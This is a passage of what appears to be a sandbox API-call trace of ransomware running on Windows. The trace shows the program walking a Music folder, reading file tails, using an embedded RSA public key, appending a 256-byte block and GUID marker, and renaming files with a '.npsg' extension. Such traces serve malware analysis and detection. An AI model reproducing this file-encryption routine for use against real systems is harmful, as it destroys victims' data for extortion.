lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400920 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0238.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.116] GetCurrentThreadId () returned 0x5b4 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b832d8 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.117] GetCurrentThreadId () returned 0x5b4 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400920 [0238.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008c0 [0238.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008d8 [0238.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.119] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x102bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.119] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.120] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.120] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.120] CloseHandle (hObject=0x644) returned 1 [0238.122] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\mdTm586GgYHzCN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\mdtm586ggyhzcn.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\mdTm586GgYHzCN.mp3.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\mdtm586ggyhzcn.mp3.npsg")) returned 1 [0238.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.123] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.124] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4518220, ftCreationTime.dwHighDateTime=0x1d5bc6f, ftLastAccessTime.dwLowDateTime=0x5cbd7ae0, ftLastAccessTime.dwHighDateTime=0x1d5c2d2, ftLastWriteTime.dwLowDateTime=0x5cbd7ae0, ftLastWriteTime.dwHighDateTime=0x1d5c2d2, nFileSizeHigh=0x0, nFileSizeLow=0x156d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MogmZJ mi.wav", cAlternateFileName="MOGMZJ~1.WAV")) returned 1 [0238.124] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\MogmZJ mi.wav") returned=".wav" [0238.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\MogmZJ mi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\mogmzj mi.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.127] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=5485) returned 1 [0238.127] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.130] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1547, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.130] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.132] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x156d, lpOverlapped=0x0) returned 1 [0238.132] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.132] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.133] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.133] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.134] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.134] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.134] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.134] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.134] GetLastError () returned 0x0 [0238.134] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.134] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.134] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.134] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.134] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.134] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008f0 | out: hHeap=0x620000) returned 1 [0238.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400938 | out: hHeap=0x620000) returned 1 [0238.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400938 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008f0 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34008d8 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0238.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008f0 | out: hHeap=0x620000) returned 1 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400938 | out: hHeap=0x620000) returned 1 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.136] GetCurrentThreadId () returned 0x5b4 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b83368 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.136] GetCurrentThreadId () returned 0x5b4 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33c2ee8 [0238.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0238.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400938 [0238.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008d8 [0238.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008f0 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008c0 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400950 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400920 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400908 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400968 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400908 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400908 [0238.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400920 | out: hHeap=0x620000) returned 1 [0238.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.139] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x156d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.139] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.139] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.139] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.139] CloseHandle (hObject=0x644) returned 1 [0238.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0238.141] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\MogmZJ mi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\mogmzj mi.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\MogmZJ mi.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\mogmzj mi.wav.npsg")) returned 1 [0238.143] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60c4ee10, ftCreationTime.dwHighDateTime=0x1d5bd5b, ftLastAccessTime.dwLowDateTime=0x9f53dc90, ftLastAccessTime.dwHighDateTime=0x1d5c3c3, ftLastWriteTime.dwLowDateTime=0x9f53dc90, ftLastWriteTime.dwHighDateTime=0x1d5c3c3, nFileSizeHigh=0x0, nFileSizeLow=0x162ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="owB8mF5PoRyx.mp3", cAlternateFileName="OWB8MF~1.MP3")) returned 1 [0238.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0238.143] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\owB8mF5PoRyx.mp3") returned=".mp3" [0238.143] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\owB8mF5PoRyx.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\owb8mf5poryx.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.145] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=90830) returned 1 [0238.145] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.147] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x162a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.148] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.149] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x162ce, lpOverlapped=0x0) returned 1 [0238.151] lstrlenA (lpString="-----BEGIN PUBLIC 